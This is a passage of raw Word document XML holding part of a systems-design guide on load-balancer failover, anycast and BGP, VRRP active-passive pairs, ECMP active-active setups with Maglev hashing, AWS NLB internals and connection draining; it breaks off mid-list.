    <w:p w14:paraId="6599BB5E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="313"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>During a failover, clients continue going to the old (dead) IP for minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B600DB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> DNS-based failover is measured in minutes, not seconds. It's a coarse-grained mechanism for disaster recovery, not for fast failover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424BBE21" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.3 Anycast-Based Global Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC9D964" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How anycast works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A5D6A0" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="314"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>The same IP address is advertised from multiple locations via BGP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0527975D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="314"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>When a client sends a packet to this IP, the Internet's routing (BGP) delivers it to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nearest</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> advertising location (in terms of network hops/AS path length).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE67917" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="314"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:lastRenderedPageBreak/>
        <w:t>No DNS involved — routing handles it at the network layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C04AEF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Behind the scenes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A079C06" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="315"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Datacenter in US announces: "I own 203.0.113.0/24" via BGP to upstream providers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F96CEC" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="315"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Datacenter in EU announces the SAME prefix: "I own 203.0.113.0/24."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD44BEF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="315"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Datacenter in Asia announces the SAME prefix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A72047E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="315"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>A client in Germany: their ISP's routing tables show the EU datacenter as the shortest path. Packets go there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23230DBF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Failover with anycast:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D3262A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>If the EU datacenter goes down, it withdraws its BGP announcement. Within seconds (BGP convergence: 1–90 seconds depending on network), traffic shifts to the next nearest datacenter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496BE190" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem — connection persistence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB93604" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>If BGP routes shift (due to network changes, not failure), existing TCP connections may suddenly route to a different datacenter. That datacenter doesn't have the connection state → connection breaks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5A1617" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> CDNs like Cloudflare use anycast for the initial connection but then tunnel traffic to a specific datacenter for the connection's lifetime (ECMP-aware connection tracking).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210E33A5" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:pict w14:anchorId="4CBA634B">
          <v:rect id="_x0000_i2678" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DFF8C4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Load Balancer High Availability — Avoiding the LB as SPOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0357370C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.1 Active-Passive LB Pair</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E7718B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FBC574" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="316"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Two LB instances share a Virtual IP (VIP) using VRRP (Virtual Router Redundancy Protocol).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D2B274" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="316"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>The active LB holds the VIP and processes all traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F14F8A3" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="316"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>The passive LB monitors the active via heartbeat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52935FA7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="316"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>If the active fails:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC96CB8" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="316"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Passive sends a Gratuitous ARP: "I now own this VIP's MAC address."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5CD3FE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="316"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Network switches update their tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303D8892" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="316"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:lastRenderedPageBreak/>
        <w:t>Traffic flows to the new active within 1–3 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AD25F3" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection state synchronization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6495BE1B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>The active LB has a connection table (tracking all in-flight requests). On failover:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAB020D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="317"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Without sync:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> All existing connections are broken. Clients must reconnect. Brief disruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7A8A4F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="317"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With sync:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Connection state is replicated in real-time to the passive. On failover, existing connections continue seamlessly. This is expensive (bandwidth, latency for syncing every connection event).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E18CD84" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real implementation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Linux HA (Keepalived + IPVS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18913279" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="318"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Keepalived manages VRRP and health checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154A06A1" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="318"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>IPVS provides L4 load balancing in the kernel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ED0A94" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="318"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>conntrackd synchronizes connection tracking state between active and passive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BBC388" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.2 Active-Active LB (with ECMP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0949043D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513444BE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Multiple LBs advertise the same VIP. Upstream routers use ECMP (Equal-Cost Multi-Path) to distribute traffic across all LBs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3E09C9" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="319"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Multiple LBs connect to the top-of-rack switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300A38EA" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="319"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Each announces the same VIP via BGP to the switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13363B22" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="319"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>The switch has multiple equal-cost paths to the VIP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22873DD4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="319"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Switch distributes packets across LBs using a hash of the 5-tuple (ensures all packets of a flow go to the same LB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395BA384" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9CCCF5" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="320"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>No wasted standby capacity — all LBs actively serve traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196F89DB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="320"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Horizontal scaling: add more LBs = more capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67084889" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="320"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>If one LB fails, the switch detects (via BGP withdraw) and redistributes across remaining LBs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D38F87" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The challenge — consistent hashing at the router:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26360D21" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:lastRenderedPageBreak/>
        <w:t>When an LB is added/removed, the router's ECMP hash redistributes flows. Existing TCP connections may shift to a different LB that doesn't have their state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A271BA" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution — Maglev hashing (Google's approach):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF18BAB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Google's Maglev paper describes a consistent hashing algorithm for ECMP that minimizes disruption: when one LB is added/removed, only 1/N of flows are redistributed (similar to consistent hashing for backends).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4987E136" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.3 Cloud-Native LB Scalability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD7A709" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How AWS NLB works behind the scenes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782FFCFA" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="321"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Not a single machine — it's a fleet of LB nodes across AZs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6408F4A2" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="321"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Uses a "flow tracker" distributed across nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469DE7C2" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="321"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Automatically scales to millions of connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D0CF73" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="321"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Zonal isolation: if one AZ's LB nodes fail, only that AZ is affected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB33DAE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="321"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Cross-zone load balancing: distributes traffic evenly across all AZs (even if AZs have different numbers of backend instances).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A51F9F3" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:pict w14:anchorId="258024DE">
          <v:rect id="_x0000_i2679" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EED2E4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Connection Draining and Graceful Shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161D5916" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.1 Why Connection Draining Matters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEF55D0" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>When a backend is removed (deployment, scaling down, failure detected):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBC0EF0" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Without draining:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F95E920" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="322"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB immediately stops sending traffic AND drops existing connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451D4598" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="322"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>In-flight requests get connection reset (RST).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F03B150" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="322"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Users see errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB5FC6B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With draining:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA14ABF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="323"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB marks the backend as "draining" — no NEW requests sent to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BD4BDD" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="323"/>
        </w:numPr>
      </w:pPr>
